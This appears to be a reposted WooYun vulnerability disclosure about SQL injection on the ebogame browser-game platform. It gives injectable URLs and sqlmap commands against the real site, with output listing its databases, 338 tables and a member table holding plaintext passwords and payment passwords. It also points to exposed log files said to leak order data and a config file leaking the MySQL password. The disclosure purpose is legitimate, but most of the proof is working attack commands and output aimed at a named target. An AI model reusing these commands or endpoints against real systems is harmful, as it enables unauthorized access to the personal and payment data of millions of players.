神刀安全网

漏洞标题: ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

漏洞详情

披露状态:

2016-01-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

做的好渣。

详细说明:

mask 区域
1.http://**.**.**/gameing.phpurl=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn_
2.http://**.**.**/codereceive.phpcid=2545_
3.http://**.**.**/news.phpcontentid=2296_
4.http://**.**.**/news.phpcontentid=1407

以上是sql注入点。

mask 区域
1.http://**.**.**/caches/configs/database.php

泄漏mysql密码但是不让外联

漏洞标题:  ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

http://sglj.ebogame.com/log.txt

http://ebo.ebogame.com/log.txt

http://www.ebogame.com/log.txt

泄漏订单信息,还有今天的。

漏洞标题:  ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

漏洞证明:

sqlmap.py -u "http://www.ebogame.com/codereceive.php?cid=2545" -D ebogame –tables >>C:/test.txt

available databases [13]:

[*] 5ebo

[*] 5ebo_bbs

[*] 5ebo_oa

[*] 5ebo_ucenter

[*] 5ebo_www

[*] 5ebo_www_test

[*] eboedu

[*] ebogame

[*] ebogame_1

[*] information_schema

[*] my

[*] mysql

[*] test

Database: ebogame

[338 tables]

+———————————–+

| api_send_mail |

| bbs_actlogs |

| bbs_apclog |

| bbs_beg |

| bbs_bmbcode |

| bbs_contacts |

| bbs_emoticons |

| bbs_favorites |

| bbs_forumdata |

| bbs_gueststat |

| bbs_invite |

| bbs_lastest |

| bbs_levels |

| bbs_onlinestat |

| bbs_polls |

| bbs_posts |

| bbs_potlog |

| bbs_primsg |

| bbs_schedule |

| bbs_search |

| bbs_shareforum |

| bbs_tags |

| bbs_threads |

| bbs_ugoptlist |

| bbs_usergroup |

| bbs_userlist |

| ebogame_activation |

| ebogame_advertising |

| ebogame_advertising_click |

| ebogame_bbs |

| ebogame_bbs_section |

| ebogame_category |

| ebogame_charge |

| ebogame_charge_20160118 |

| ebogame_charge_bf |

| ebogame_charge_copy |

| ebogame_charge_heepay |

| ebogame_content |

| ebogame_extension |

| ebogame_extension_member |

| ebogame_extension_percent |

| ebogame_extension_settlemen |

| ebogame_extension_settlemen_once |

| ebogame_game_areas |

| ebogame_game_code |

| ebogame_game_gift_code |

| ebogame_game_gift_code_ |

| ebogame_game_gift_code_17173 |

| ebogame_game_gift_info_ |

| ebogame_game_gift_info_17173 |

| ebogame_games |

| ebogame_integral |

| ebogame_member |

| ebogame_member_char |

| ebogame_member_info |

| ebogame_member_integral |

| ebogame_member_login |

| ebogame_member_price |

| ebogame_member_serv |

| ebogame_news |

| ebogame_pictures |

| ebogame_price |

| ebogame_question_reply |

| ebogame_questions |

| pre_common_admincp_cmenu |

| pre_common_admincp_group |

| pre_common_admincp_member |

| pre_common_admincp_perm |

| pre_common_admincp_session |

| pre_common_admingroup |

| pre_common_adminnote |

| pre_common_advertisement |

| pre_common_advertisement_custom |

| pre_common_banned |

| pre_common_block |

| pre_common_block_favorite |

| pre_common_block_item |

| pre_common_block_item_data |

| pre_common_block_permission |

| pre_common_block_pic |

| pre_common_block_style |

| pre_common_block_xml |

| pre_common_cache |

| pre_common_card |

| pre_common_card_log |

| pre_common_card_type |

| pre_common_connect_guest |

| pre_common_credit_log |

| pre_common_credit_rule |

| pre_common_credit_rule_log |

| pre_common_credit_rule_log_field |

| pre_common_cron |

| pre_common_devicetoken |

| pre_common_district |

| pre_common_diy_data |

| pre_common_domain |

| pre_common_failedlogin |

| pre_common_friendlink |

| pre_common_grouppm |

| pre_common_invite |

| pre_common_magic |

| pre_common_magiclog |

| pre_common_mailcron |

| pre_common_mailqueue |

| pre_common_member |

| pre_common_member_action_log |

| pre_common_member_connect |

| pre_common_member_count |

| pre_common_member_crime |

| pre_common_member_field_forum |

| pre_common_member_field_home |

| pre_common_member_grouppm |

| pre_common_member_log |

| pre_common_member_magic |

| pre_common_member_medal |

| pre_common_member_profile |

| pre_common_member_profile_setting |

| pre_common_member_security |

| pre_common_member_stat_field |

| pre_common_member_status |

| pre_common_member_validate |

| pre_common_member_verify |

| pre_common_member_verify_info |

| pre_common_myapp |

| pre_common_myinvite |

| pre_common_mytask |

| pre_common_nav |

| pre_common_onlinetime |

| pre_common_patch |

| pre_common_plugin |

| pre_common_pluginvar |

| pre_common_process |

| pre_common_regip |

| pre_common_relatedlink |

| pre_common_report |

| pre_common_searchindex |

| pre_common_secquestion |

| pre_common_session |

| pre_common_setting |

| pre_common_smiley |

| pre_common_sphinxcounter |

| pre_common_stat |

| pre_common_statuser |

| pre_common_style |

| pre_common_stylevar |

| pre_common_syscache |

| pre_common_tag |

| pre_common_tagitem |

| pre_common_task |

| pre_common_taskvar |

| pre_common_template |

| pre_common_template_block |

| pre_common_template_permission |

| pre_common_uin_black |

| pre_common_usergroup |

| pre_common_usergroup_field |

| pre_common_word |

| pre_common_word_type |

| pre_connect_disktask |

| pre_connect_feedlog |

| pre_connect_memberbindlog |

| pre_connect_postfeedlog |

| pre_connect_tthreadlog |

| pre_forum_access |

| pre_forum_activity |

| pre_forum_activityapply |

| pre_forum_announcement |

| pre_forum_attachment |

| pre_forum_attachment_0 |

| pre_forum_attachment_1 |

| pre_forum_attachment_2 |

| pre_forum_attachment_3 |

| pre_forum_attachment_4 |

| pre_forum_attachment_5 |

| pre_forum_attachment_6 |

| pre_forum_attachment_7 |

| pre_forum_attachment_8 |

| pre_forum_attachment_9 |

| pre_forum_attachment_exif |

| pre_forum_attachment_unused |

| pre_forum_attachtype |

| pre_forum_bbcode |

| pre_forum_collection |

| pre_forum_collectioncomment |

| pre_forum_collectionfollow |

| pre_forum_collectioninvite |

| pre_forum_collectionrelated |

| pre_forum_collectionteamworker |

| pre_forum_collectionthread |

| pre_forum_creditslog |

| pre_forum_debate |

| pre_forum_debatepost |

| pre_forum_faq |

| pre_forum_forum |

| pre_forum_forum_threadtable |

| pre_forum_forumfield |

| pre_forum_forumrecommend |

| pre_forum_groupcreditslog |

| pre_forum_groupfield |

| pre_forum_groupinvite |

| pre_forum_grouplevel |

| pre_forum_groupuser |

| pre_forum_imagetype |

| pre_forum_medal |

| pre_forum_medallog |

| pre_forum_memberrecommend |

| pre_forum_moderator |

| pre_forum_modwork |

| pre_forum_onlinelist |

| pre_forum_order |

| pre_forum_poll |

| pre_forum_polloption |

| pre_forum_pollvoter |

| pre_forum_post |

| pre_forum_post_location |

| pre_forum_post_moderate |

| pre_forum_post_tableid |

| pre_forum_postcache |

| pre_forum_postcomment |

| pre_forum_postlog |

| pre_forum_poststick |

| pre_forum_promotion |

| pre_forum_ratelog |

| pre_forum_relatedthread |

| pre_forum_replycredit |

| pre_forum_rsscache |

| pre_forum_spacecache |

| pre_forum_statlog |

| pre_forum_thread |

| pre_forum_thread_moderate |

| pre_forum_threadaddviews |

| pre_forum_threadclass |

| pre_forum_threadclosed |

| pre_forum_threaddisablepos |

| pre_forum_threadimage |

| pre_forum_threadlog |

| pre_forum_threadmod |

| pre_forum_threadpartake |

| pre_forum_threadpreview |

| pre_forum_threadrush |

| pre_forum_threadtype |

| pre_forum_trade |

| pre_forum_tradecomment |

| pre_forum_tradelog |

| pre_forum_typeoption |

| pre_forum_typeoptionvar |

| pre_forum_typevar |

| pre_forum_warning |

| pre_home_album |

| pre_home_album_category |

| pre_home_appcreditlog |

| pre_home_blacklist |

| pre_home_blog |

| pre_home_blog_category |

| pre_home_blog_moderate |

| pre_home_blogfield |

| pre_home_class |

| pre_home_click |

| pre_home_clickuser |

| pre_home_comment |

| pre_home_comment_moderate |

| pre_home_docomment |

| pre_home_doing |

| pre_home_doing_moderate |

| pre_home_favorite |

| pre_home_feed |

| pre_home_feed_app |

| pre_home_follow |

| pre_home_follow_feed |

| pre_home_follow_feed_archiver |

| pre_home_friend |

| pre_home_friend_request |

| pre_home_friendlog |

| pre_home_notification |

| pre_home_pic |

| pre_home_pic_moderate |

| pre_home_picfield |

| pre_home_poke |

| pre_home_pokearchive |

| pre_home_share |

| pre_home_share_moderate |

| pre_home_show |

| pre_home_specialuser |

| pre_home_userapp |

| pre_home_userappfield |

| pre_home_visitor |

| pre_mobile_setting |

| pre_portal_article_content |

| pre_portal_article_count |

| pre_portal_article_moderate |

| pre_portal_article_related |

| pre_portal_article_title |

| pre_portal_article_trash |

| pre_portal_attachment |

| pre_portal_category |

| pre_portal_category_permission |

| pre_portal_comment |

| pre_portal_comment_moderate |

| pre_portal_rsscache |

| pre_portal_topic |

| pre_portal_topic_pic |

| pre_security_evilpost |

| pre_security_eviluser |

| pre_security_failedlog |

| pre_ucenter_admins |

| pre_ucenter_applications |

| pre_ucenter_badwords |

| pre_ucenter_domains |

| pre_ucenter_failedlogins |

| pre_ucenter_feeds |

| pre_ucenter_friends |

| pre_ucenter_mailqueue |

| pre_ucenter_memberfields |

| pre_ucenter_members |

| pre_ucenter_mergemembers |

| pre_ucenter_newpm |

| pre_ucenter_notelist |

| pre_ucenter_pm_indexes |

| pre_ucenter_pm_lists |

| pre_ucenter_pm_members |

| pre_ucenter_pm_messages_0 |

| pre_ucenter_pm_messages_1 |

| pre_ucenter_pm_messages_2 |

| pre_ucenter_pm_messages_3 |

| pre_ucenter_pm_messages_4 |

| pre_ucenter_pm_messages_5 |

| pre_ucenter_pm_messages_6 |

| pre_ucenter_pm_messages_7 |

| pre_ucenter_pm_messages_8 |

| pre_ucenter_pm_messages_9 |

| pre_ucenter_protectedmembers |

| pre_ucenter_settings |

| pre_ucenter_sqlcache |

| pre_ucenter_tags |

| pre_ucenter_vars |

| sglj_charge |

| sglj_coin |

| sglj_extension |

+———————————–+

ebogame_member

sqlmap.py -u "http://www.ebogame.com/codereceive.php?cid=2545" -D ebogame -T ebogame_member –columns

Database: ebogame

Table: ebogame_member

[24 columns]

+—————-+———–+

| Column | Type |

+—————-+———–+

| 56xiu_id | char(50) |

| codestate | int(1) |

| display | int(1) |

| error_count | int(1) |

| error_time | int(11) |

| id | int(11) |

| integral | int(11) |

| integral_get | int(11) |

| integral_use | int(11) |

| name | char(20) |

| newip | char(20) |

| newtime | int(11) |

| oldip | char(20) |

| oldtime | int(11) |

| password | char(40) |

| password_nomd5 | char(20) |

| password_old | char(20) |

| pay_pass | char(40) |

| pay_pass_nomd5 | char(20) |

| regtime | int(11) |

| role | char(2) |

| times | int(11) |

| urlsource | char(100) |

| yiqidd_id | int(11) |

+—————-+———–+

漏洞标题:  ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

漏洞标题:  ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

漏洞标题:  ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

帐号可以直接登录

修复方案:

过滤

版权声明:转载请注明来源 陆由乙@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: ebogame页游平台多处SQL注入漏洞(ROOT权限)导致235W万玩家信息泄露(用户名/密码/支付密码等)还有订单信息泄漏与mysql密码泄漏

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮